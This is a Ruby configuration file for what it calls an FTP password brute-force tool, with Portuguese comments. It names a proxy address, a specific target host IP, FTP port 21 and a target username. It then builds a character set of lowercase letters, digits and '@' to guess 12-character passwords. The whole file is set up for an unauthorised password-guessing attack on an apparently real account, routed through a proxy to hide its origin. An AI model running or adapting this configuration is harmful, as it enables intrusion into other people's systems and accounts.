=begin
Fast Configuration for FTP Passoword Brutal Kill!
To use remove the # in the beggin of the lines.
=end  

$proxy = '218.207.161.201:9999'
#146.115.11.160:80
$host = '187.45.241.116'
$port = 21
$user = 'etecportoferreira'
$passive = true
$digits_min = 12
$digits_limit = 12
#$tryingthis = 'çäãáàâëéèêïíìîöõóòôüúùû!@$&'.split('')
$tryingthis = '@'.split('')

#Cria as letras
('a'..'z').to_a.each{|c|
  $tryingthis.push(c)
}

#Cria os números
('0'..'9').to_a.each{|c|
  $tryingthis.push(c)
}

#Cria os upcases
#for i in 0..($tryingthis.size - 1)
#  down = $tryingthis[i]
#  up = down.upcase
#  if down != up
#    $tryingthis.push(up)
#  end
#end